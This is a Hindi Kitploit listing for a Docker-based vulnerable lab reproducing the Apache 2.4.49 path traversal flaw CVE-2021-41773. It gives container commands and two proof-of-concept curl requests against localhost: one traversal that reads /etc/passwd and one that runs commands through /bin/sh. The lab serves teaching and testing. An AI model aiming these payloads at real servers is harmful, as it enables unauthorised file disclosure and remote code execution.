Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41773S — # CVE-2021-41773 Apache पाथ ट्रैवर्सल के लिए Docker-आधारित असुरक्षित लैब, जो नियंत्रित वातावरण में फ़ाइल पढ़ने और रिमोट कोड निष्पादन के लिए PoC कॉन्फ़िगरेशन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/mightysai1997/cve-2021-41773s
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

# CVE-2021-41773 Apache पाथ ट्रैवर्सल के लिए Docker-आधारित असुरक्षित लैब, जो नियंत्रित वातावरण में फ़ाइल पढ़ने और रिमोट कोड निष्पादन के लिए PoC कॉन्फ़िगरेशन प्रदान करता है।

रिपॉजिटरी देखें
129 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41773 Apache path traversal के लिए असुरक्षित docker इमेजेस

यह भेद्यता केवल संस्करण 2.4.49 पर लागू होती है, जिसमें विशेष गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन होते हैं। कुछ स्थितियों में इसके परिणामस्वरूप फ़ाइल पठन या कोड निष्पादन हो सकता है।

tweet https://twitter.com/ptswarm/status/1445376079548624899

असुरक्षित फ़ाइल पठन कॉन्फ़िग

कंटेनरों को सीधे Docker Hub से निम्न कमांड का उपयोग करके पुल किया जा सकता है

docker pull blueteamsteve/cve-2021-41773:no-cgid

और निम्न कमांड का उपयोग करके निष्पादित किया जा सकता है

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Apache लॉग्स को नीचे दिए गए कमांड से देखा जा सकता है, या stdio स्ट्रीम करने के लिए उपरोक्त run कमांड से "-dit" हटा दें docker logs <container-id>

फ़ाइल पठन के लिए PoC

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

असुरक्षित RCE कॉन्फ़िग

कंटेनरों को सीधे Docker Hub से निम्न कमांड का उपयोग करके पुल किया जा सकता है

docker pull blueteamsteve/cve-2021-41773:with-cgid

और निम्न कमांड का उपयोग करके निष्पादित किया जा सकता है

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Apache लॉग्स को नीचे दिए गए कमांड से देखा जा सकता है, या stdio स्ट्रीम करने के लिए उपरोक्त run कमांड से "-dit" हटा दें docker logs <container-id>

RCE के लिए PoC

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

कस्टम docker कंटेनर बनाएँ

सबडायरेक्टरीज़ में मौजूद dockerfile और टेम्पलेट httpd.conf फ़ाइलों का उपयोग करके अपने स्वयं के संस्करणों को संशोधित और बनाएँ

  • फ़ाइल पठन के लिए असुरक्षित कॉन्फ़िग के रूप में ./no-cgi का उपयोग करें
  • कोड निष्पादन के लिए असुरक्षित कॉन्फ़िग के रूप में ./with-cgi का उपयोग करें
टूल डाउनलोड करें